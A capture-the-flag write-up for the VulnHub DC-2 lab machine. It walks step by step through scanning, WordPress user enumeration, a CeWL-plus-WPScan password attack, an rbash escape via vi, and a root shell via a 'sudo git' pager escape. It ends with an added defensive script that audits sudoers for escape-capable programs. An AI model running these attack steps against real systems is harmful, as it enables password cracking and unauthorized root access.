Overview
DC-2 is a beginner-friendly VulnHub machine focused on WordPress enumeration, password attacks, restricted shell escape, and Linux privilege escalation.
The attack path was:
WordPress -> user enumeration -> CeWL wordlist -> WPScan password attack -> SSH as tom -> rbash escape -> su jerry -> sudo git -> root
Enumeration
I started by finding the target on the local network.
Network discovery: sudo netdiscover -r 192.168.56.0/24
After finding the IP, I scanned the machine with Nmap.
Nmap scan: nmap -sC -sV -oN nmap.txt <TARGET_IP>
The useful findings were:
| Service | Finding | Why it mattered |
|---|---|---|
| HTTP | Port 80 open | The website became the main target. |
| SSH | Port 7744 open | SSH was running on a non-standard port. |
| CMS | WordPress | This pointed the attack toward WordPress enumeration. |
| Hostname | dc-2 | The site needed a hostname entry to load correctly. |
The website needed the hostname to work, so I added it to /etc/hosts.
Hosts file: sudo nano /etc/hosts
Entry added: <TARGET_IP> dc-2
Then I opened the site at http://dc-2.
WordPress Enumeration
I used WPScan to enumerate users on the WordPress site.
User enumeration: wpscan --url http://dc-2 --enumerate u
The important users found were:
| User | Use in the attack path |
|---|---|
| admin | Found during enumeration, but not the main path I used. |
| tom | Used later for SSH access. |
| jerry | Used later for privilege escalation. |
Finding real usernames was important because I could use them later with a password list.
Creating a Wordlist
One of the hints pointed toward using the website content to create a custom wordlist.
I used CeWL to generate a password list from words found on the site.
CeWL wordlist: cewl http://dc-2 -w passwords.txt
This gave me a small custom wordlist that matched the target better than a random large list.
Password Attack
After getting usernames and creating the wordlist, I used WPScan to test the passwords.
Users file: users.txt
| File | Contents |
|---|---|
| users.txt | admin, tom, jerry |
WPScan password attack: wpscan --url http://dc-2 -U users.txt -P passwords.txt
This gave valid credentials for the users needed in the next steps.
SSH as tom
After getting credentials, I logged in through SSH as tom.
SSH login: ssh tom@<TARGET_IP> -p 7744
The shell was restricted with rbash, so normal commands and paths were limited.
Escaping rbash
I found that vi was available, so I used it to escape the restricted shell.
| Step | Command |
|---|---|
| Open vi | vi |
| Set shell | :set shell=/bin/bash |
| Spawn shell | :shell |
| Fix PATH | export PATH=/bin:/usr/bin:/usr/local/bin:$PATH |
After that, I had a more normal shell as tom.
Switching to jerry
Next, I switched to the jerry user using the credentials found earlier.
Switch user: su jerry
Then I confirmed the user.
User check: whoami
At this point, I was working as jerry.
Privilege Escalation
As jerry, I checked sudo permissions.
Sudo check: sudo -l
The important finding was that jerry could run git as root.
| User | Sudo permission | Why it mattered |
|---|---|---|
| jerry | /usr/bin/git as root | git can open a pager, which can be abused to spawn a shell. |
I used git to open the pager.
Run git as root: sudo git -p help config
Inside the pager, I typed:
Pager escape: !/bin/bash
This spawned a root shell.
I confirmed root with whoami and id.
Final Flag
After getting root, I moved to the root directory and read the final flag.
Root folder: cd /root
Final flag: cat final-flag.txt
What I Learned
DC-2 was useful for practicing WordPress enumeration and basic Linux privilege escalation.
The most important parts were finding real usernames, creating a custom wordlist from the website, and noticing that SSH was running on a non-standard port.
The privilege escalation was also a good reminder that normal tools like vi and git can be dangerous when they are available in the wrong context.
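The same lesson as a check a defender can run (an added example, not part of the original writeup): it reads sudoers-style rules and reports any that grant a program able to start a shell, unless the rule carries the sudoers NOEXEC tag. The program list, the function name audit_sudoers, and the sample rules are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example: flag sudoers rules that grant programs able to start a shell.
# ESCAPE_CAPABLE is an assumed starting list: git and vi come from this
# writeup, the rest are common pagers and editors with the same feature.
ESCAPE_CAPABLE="git vi vim less more man"

# Constructed sample rules for illustration, not copied from the DC-2 machine.
SAMPLE_SUDOERS='# constructed sample
jerry ALL=(root) NOPASSWD: /usr/bin/git
backup ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
deploy ALL=(root) /usr/sbin/nginx -s reload, /usr/bin/vi /etc/nginx/nginx.conf
ops ALL=(root) /usr/bin/lsof -i'

# audit_sudoers: read sudoers-style rules on stdin and print "user:binary" for
# every granted command that is escape-capable and not covered by NOEXEC.
audit_sudoers() {
  awk -v risky="$ESCAPE_CAPABLE" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*#/ || /^[ \t]*$/ || /^Defaults/ { next }
    {
      user = $1
      spec = $0
      sub(/^[^=]*=[ \t]*/, "", spec)        # drop "user host ="
      sub(/^\([^)]*\)[ \t]*/, "", spec)     # drop the "(runas)" part
      m = split(spec, cmds, /,[ \t]*/)
      noexec = 0
      for (i = 1; i <= m; i++) {
        c = cmds[i]
        # Tags (NOPASSWD:, NOEXEC:, ...) precede a command and carry over
        # to the commands that follow it in the same rule.
        while (match(c, /^[A-Z_]+:[ \t]*/)) {
          tag = substr(c, 1, RLENGTH)
          if (tag ~ /^NOEXEC:/) noexec = 1
          if (tag ~ /^EXEC:/) noexec = 0
          c = substr(c, RLENGTH + 1)
        }
        split(c, words, " ")
        k = split(words[1], parts, "/")
        if ((parts[k] in bad) && !noexec) print user ":" words[1]
      }
    }'
}

# Run the audit over the sample; on a real host feed it the sudoers files.
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```
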